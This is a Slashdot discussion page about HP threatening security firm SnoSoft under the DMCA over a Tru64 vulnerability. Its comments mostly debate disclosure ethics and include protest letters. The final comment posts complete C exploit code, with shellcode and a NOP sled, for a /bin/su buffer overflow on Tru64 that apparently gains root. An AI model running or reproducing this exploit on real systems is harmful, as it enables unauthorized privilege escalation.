Slashdot Mirror


HP Uses DMCA To Quash Vulnerability Publication

Several readers wrote to note the fact that HP has evidently threatened to use the DMCA and computer crime laws against SnoSoft who have found a security flaw in Tru64. The quote from the HP VP is that the accused "could be fined up to $500,000 and imprisoned for up to five years."

25 of 603 comments

  1. Bruce Perens by BoyPlankton · · Score: 5, Insightful

    So this is the real reason HP didn't want Bruce Perens to demonstrate against the DMCA?

    1. Re:Bruce Perens by Bruce+Perens · · Score: 5, Informative
      I don't know, but I am not happy to hear this at all. And if it's true, I'll take them to task for it. This is the first I've heard of the whole thing.

      Bruce

    2. Re:Bruce Perens by Bruce+Perens · · Score: 5, Informative
      By the way, my phone is 510-526-1165, if you feel the need to talk about this. I leave that line off the hook when I don't want calls, but it's available most of the day.

      Bruce

    3. Re:Bruce Perens by Bruce+Perens · · Score: 5, Interesting
      People really resist the phone. Lots will reply to me here. A few will email. None will call. No kidding. That number has been on my web page for a year, and the calls I get are from the press, and the occasional Nigerian money-laundering scam.

      Bruce

  2. Apache by vex24 · · Score: 5, Insightful
    Funny how when Apache had a hole released before they had a chance to fix it, they gave off a muted air of annoyance and fur that had been rubbed the wrong way.

    Very mature compared to what big business does. "Wahh wahhh wahh!!! Help us Uncle Sam, we're poor defenseless transnational corporations!" Buncha whiners.

    --

    People shape laws. Not the other way around.

    1. Re:Apache by gmack · · Score: 5, Insightful

      Look at the difference though .. Xforce didn't wait before releasing a patch that failed to fix the problem along with an advisory that didn't grasp the full scope of the bug they found.

      These guys waited a YEAR and HP still hadn't fixed the problem.

  3. Who's laughing at Alan Cox now? by rodgerd · · Score: 5, Insightful

    When Alan Cox originally discussed the notion that companies would (mis)use the DMCA in the security field, he was widely attacked for being silly.

    Anyone still feel like laughing?

  4. Meanwhile..... by shoemakc · · Score: 5, Funny

    Halfway around the world, Bill Gates breathes a long sigh of relief as Microsoft's profitability is assured well into the next century...

    -Chris

    --
    --an unbreakable toy is useful for breaking other toys--
  5. An Excellent Quote by unsinged+int · · Score: 5, Insightful

    Finisterre said that while he wanted to resolve the dispute with HP, he resented receiving DMCA threats. "We are like the guys that found out that Firestone tires have issues on Ford Explorers," he said. "It's not our fault your Explorer has crap tires. We just pointed it out. We should not get attacked for pointing out issues in someone's product nor for proving it is possible."

    When will people learn this is the same thing?

  6. Ridiculous by dh003i · · Score: 5, Insightful

    The public has the right to know about these security flaws, just as much as we have the right to know if the tires we buy pass safety standards.

    HP trying to cover this up just proves it's a problem. HP is using the DMCA to prevent people from discussing valid flaws in their OS.

    People have the right to know if the car they're driving -- or are going to buy -- is unsafe. Why? Because their lives depend on it, literally. For the same reason, people have the right to know if the OS they're using is secure. Why? Because their lives depend on it, or at least their careers. Data important to one's career (i.e., scientific experimental data) is stored on one's computer. Private information -- i.e., credit card information -- is stored on a computer. Security holes can literally destroy one's life.

    We have the right to know exactly what problems there are in our software.

  7. Tell HP's CEO what you think! by Arcturax · · Score: 5, Informative

    Email their president and CEO from this page!

    Tell her in NICE non-flaming tones why you feel what they are doing is wrong. Explain that this kind of action makes you unwilling to buy any more products from them.

    --

    --Won't that be grand? Computers and the programs will start thinking and the people will stop. - Dr. Walter Gibbs
  8. Babelfish Translation by shokk · · Score: 5, Funny

    For those of you who are HPaq-ese impaired, here is the message:

    Dear HPaq customers,
    We thank you for having purchased our products in the past, but now that we have finalized our merger and cashed our options, we have lost our minds and come to the boggling conclusion that we don't want your money anymore. Please do not buy our products because honestly you can't trust us to inform you when there is a defect with our product. This includes any servers, and handhelds our merger partner might peddle, printers, or whatever the hell it is these people do. As a sign of our gratitude for your service, we will be providing each future customer with a free Berber mousepad under which you can sweep any problems you discover. If you believe the problem doesn't exist, and we believe the problem doesn't exist, then we can work together to warp reality and drive customers away like poor starving slobs on the street corner to a free luncheon. Personally, I don't recommend you use these things in anything that might risk a human life or attempt to improve society in any way. Heck, I wouldn't run my porn servers on this crap. Well, gotta run, my coke dealer is here. And don't forget to F off!

    P.S. - Don't unravel the mousepad to see how it's made or we'll sue your ass into orbit under the DMCA.

    --
    "Beware of he who would deny you access to information, for in his heart, he dreams himself your master."
  9. Dear Ms. Fiorina by Gerdts · · Score: 5, Interesting
    Posted at http://www.hp.com/hpinfo/execteam/email/fiorina/index.htm

    I am quite disappointed with HP's recent conduct with two issues related to the DMCA. I am in a senior enough position as a UNIX administrator that I have significant impact in how a multi-million dollar IT budget is spent. HP's invocation of the DMCA reduces my trust in HP as a vendor of secure and reliable technology. Therefore I am less inclined now than I ever have been in the past to purchase HP products.

    The first issue is HP's request that Bruce Perens not present his findings on DVD copyright controls. If he is acting on his own behalf, and includes a disclaimer that this is a separate issue from what he does under the employment of HP, he should be allowed to go forth. If he is presenting HP intellectual property, HP has the right and responsibility to protect itself. This, however, does not seem to be the case.

    The more disturbing issue is with regards to the handling of SnoSoft's publication of root exploits to the Tru64 operating system. As a UNIX administrator, I am responsible for researching technologies that I will put into production. Many times, these products are used to protect the intellectual property, stability, or other things that are of great importance to my employer's success and my career. If security researchers cannot force many of the bugs out in the open before I evaluate products, I have much more work on my hands. Furthermore, if I find a bug that I know can be used to compromise my system, without the ability to publicly discuss and disclose the bug, I may be unable to get a fix from the vendor or a home-grown workaround. If I am at the complete mercy of my vendors' good will, I fear that I will have a system that lacks stability and security.

    Please reconsider your decision to use the Digital Millennium Copyright Act to stifle free speech. Once you come to the realization that the DMCA is not a law that is useful for HP, please put your lobbying efforts into repealing it and push for funding to enforce pre-DMCA laws that already provide more than adequate protections on copyright and other intellectual property issues.

    I do not speak for my employer. Please remember, however, that my employer trusts me to make decisions that are in the employer's best interest. Your actions suggest that the purchase of HP products is in the best interest of no employer that I would work for.

  10. Re:DMCA and research by seanadams.com · · Score: 5, Insightful

    As of now, HP has also only threatened to invoke it.

    Uh, no, "invoking the DMCA" is precisely what HP is doing, though they haven't formally filed a complaint with the feds. How can you possibly defend these unscrupulous fucks? From dictionary.com.

    invoke
    tr.v. invoked, invoking, invokes
    ...
    2. To appeal to or cite in support or justification.
    ...
    5. To resort to; use or apply:
    ...

  11. Re:Bruce, it's time for you to make a decision by gilroy · · Score: 5, Insightful
    Blockquoth the poster:
    I just wish people would stop believing that any company exists for any reason other than to increase the wealth of its shareholders.
    I just wish people would stop believing that any company exists for the sole reason of increasing the wealth of its shareholders. It used to be that people believed in ethics -- that there are societal responsibilities that compete with shareholder equity. Of course it used to be that the primary purpose of a company was to produce something, which something would hopefully allow a profit.

    You know it is possible -- and ethical! -- to not do something because it goes too far. Or is HP obligated to murder someone if it increases shareholder profit? And before you say, "Well, the law imposes too high a cost", answer me this: What if you could prove the legal sanction was less than the profit realized? Should HP kill the person? Must they?

  12. Re:Bruce, it's time for you to make a decision by ChaosDiscord · · Score: 5, Interesting
    I just wish people would stop believing that any company exists for any reason other than to increase the wealth of its shareholders. Sorry folks, this is just the American way.

    The American way is the right to Life, Liberty, and the pursuit of Happiness. The American way is that no law shall abridge freedom of speech or of the press.

    "The only law shalt be maximize your stock price at all costs" is part of something worse. It isn't even part of the Capitalist way, for true capitalism only works with wide availability of information and strong competition. This is the inbred freak son of Capitalism and Greed. This is the way of life of scam artists, shysters, hucksters, thieves. This is the Monopolist's Way.

    I understand perfectly well that "thou shalt increase your stock price or face lawsuits," but I don't have to like it. It's a corruption of everything America, freedom, and true capitalism. I have every right to name it beast and call for it to be cast into the fires.

  13. Leave it to crackers by richieb · · Score: 5, Insightful
    Frankly, I think that all the security experts should stop looking at Tru64 and just publicize the fact that they don't recommend it for uses where security is required.

    Let the crackers have it.

    --
    ...richie - It is a good day to code.
  14. Re:Excerpt from the CNet article by Karma+Farmer · · Score: 5, Insightful

    Call me crazy, but if I were a mega-corporation, I wouldn't want someone releasing "warez" to break into my systems this way.

    No, of course you wouldn't like it. And, if you were an emperor who got suckered into walking around naked, you'd be fairly pissed at the kid who pointed out that you were, in fact, naked.

    But, this story has nothing to do with HP "liking" or "not liking" it when people (rightly) point out that they're walking around naked. The story is about the fact that the DMCA has emboldened HP to the point that they feel it's better to walk around naked and sue anyone who notices, rather than buying some reasonable clothes.

    Etiquette in the security community demands that the discoverers of holes give companies reasonable time to respond to security problems, before publicizing the security problems. But this courtesy is not, in any way, a courtesy towards the company that manufactures the flawed product. That company's opinion in the matter doesn't mean squat. It is a courtesy extended entirely to the users of the product. Users are harmed if they do not know about exploitable flaws in the products they use, but at the same time users are harmed if the exploitable flaws are widely known before patches are available. The only reasonable role for a company with flawed products in the security process is to work diligently to minimize the harm to users, by the only method available to them -- by expediting patches for their products, and thus providing an environment where the user can be informed of security flaws in their product as quickly as possible.

    Unfortunately, what HP has done here is imagine itself to have some other role in the security process -- someone at HP is under the completely mistaken impression that their opinion of the security process matters in any way. It does not. The courtesies of the security process are entirely towards the users of the flawed product. People have a right to know about flawed products. HP has the opportunity to provide patches to their product, so that those users might have some alternative to simply throwing all of their HP equipment in the garbage, but that is entirely HP's opportunity, and really of no concern either to the users or to the security professionals who disclose the hole.

  15. Re:Bruce, it's time for you to make a decision by elmegil · · Score: 5, Insightful
    Bruce,

    I just want to say that I am 100% behind your request for time instead of having to answer to a horde of mad slashdot zealots wielding pitchforks when you've had no time to investigate. Not all of us here are so quick to assume the worst.

    Good luck in your discussions with the PHB's that be.

    --
    7 November 2006: The day Americans realized corruption and incompetence weren't addressing 11 September 2001
  16. This is a marketing disaster for HP. by Futurepower(R) · · Score: 5, Interesting
    Bruce, if I were president of HP, I would immediately fire Kent Ferson, the vice president who wrote the letter. The letter says, basically, that HP is not able to fix the problem, and would rather hide its security problems.

    This is a marketing disaster for HP. Probably Mr. Ferson has little technical knowledge and does not realize that his letter speaks loudly and clearly to the whole world of technically knowledgeable people, and does irreparable damage to HP.

    We live in an amazing world where free products are better than expensive ones. The open source response to a security problem is to have a bug fix on all the mirrors in 48 hours. The response of billion dollar companies with tens of thousands of well-paid employees is to try to weasel out of doing the right thing. Who would have guessed it would be that way?

    It seems that you could do HP a big favor if you could educate top management. But maybe they are not educable.

    1. Re:This is a marketing disaster for HP. by Bruce+Perens · · Score: 5, Interesting
      Let's not get draconian yet, it could be correcting a wrong with another wrong. Maybe an apology is what is necessary, and perhaps that would teach a better lesson to all involved. But I can't say what is necessary until I see full data. All I have tonight are news reports.

      Bruce

  17. My letter to my Representative and Senators by LordNimon · · Score: 5, Insightful
    This is a letter I just sent to my Representative and Senators. Permission is given to anyone who wants to use this text to send a similar letter.

    Today I read an article on news.com (http://news.com.com/2100-1023-947325.html) that Hewlett-Packard has intended to use the Digital Millennium Copyright Act (DMCA) to punish a company that has released information about a security vulnerability in an HP product. For quite some time I have been telling you that the DMCA is a bad law that needs to be repealed, and this is just more evidence to that effect. HP has known about this vulnerability for a year, but has chosen to do nothing to fix it.

    HP's action could set a precedent that would stifle technology research. Companies would be free to release broken technologies that would eventually be used in high-security environments. Anyone who attempted to test the strengths of these products would be branded a criminal.

    HP's customers and the American public deserve to know about security issues in HP's products. Withholding such information is just like the accounting scandals that have been rampant in recent times. Insecure technology is a weapon that hackers and terrorists can use against us. So when an American company decides to hide behind an American law rather than fix its products, our politicians need to re-examine that law.

    I urge you to sponsor legislation that will repeal the DMCA. Americans deserve better. Please write back to me and let me know that you support my fair use rights in a digital world, and that you'll be working to repeal the DMCA.

    --
    And the men who hold high places must be the ones who start
    To mold a new reality... closer to the heart
  18. Re:I need your call on this, please, folks. by friedmud · · Score: 5, Insightful

    Bruce,

    I guess I don't understand how full disclosure can equate to a shakedown.

    The company (snosoft) seems like a more or less legit research company, and the fact that they have a full disclosure policy in no way says that they are trying to take out companies. It just says, up front, that they have a policy of disclosing these security breaches that they find.

    On the other hand they have to make money somehow - so they contract out their services to companies who wish to have their software audited.

    I could be wrong, but by looking through their posts on security focus, I don't think they are out to extort money from companies - and this is especially true if they gave HP a year to fix this problem (in fact if that is true then you should REALLY stick it to the top brass).

    It could go either way - but it doesn't look like they are in the business of extortion. And the fact that they have been around for a while, and seem to be respected in the security community says quite a lot....

    ON THE OTHER HAND.... I don't see how it is in any way shape or form right for HP to sic the DMCA on them, no matter what their business practices are. This is a vulnerability in HPQ's software and should not be treated with such arrogance (don't report it or else!).

    Just my $.02

    Derek

  19. Re:I need your call on this, please, folks. by Bruce+Perens · · Score: 5, Interesting
    I read "full disclosure unless bound by contract" as "full disclosure unless you pay us to hide what we found". If I had written that page, I would have spun that line differently. I don't yet know if my (admittedly paranoid) interpretation represents the way they operate, or not.

    Bruce

  20. Let's try this again... by User+956 · · Score: 5, Interesting

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    char shellcode[]=
    "\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47"
    "\x11\x14\xe3\x43" "\x20\x35\x20\x42" "\xff\xff\xff\xff" "\x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";

    main(int argc, char *argv[]) {
    int i, j;
    char buffer[8239];
    char payload[15200];
    char nop[] = "\x1f\x04\xff\x47";

    bzero(&buffer, 8239);
    bzero(&payload, 15200);

    for (i=0;i<8233;i++)
    buffer[i] = 0x41;

    /* 0x140010401 */

    buffer[i++] = 0x01;
    buffer[i++] = 0x04;
    buffer[i++] = 0x01;
    buffer[i++] = 0x40;
    buffer[i++] = 0x01;

    for (i=0;i<15000;) {
    for(j=0;j<4;j++) {
    payload[i++] = nop[j];
    }
    }

    for (i=i,j=0;j<sizeof(shellcode);i++,j++)
    payload[i] = shellcode[j];

    printf("/bin/su by phased\n");
    printf("payload %db\n", strlen(payload));
    printf("buffer %db\n", strlen(buffer));

    execl("/usr/bin/su", "su", buffer, payload, 0);

    }

    --
    The theory of relativity doesn't work right in Arkansas.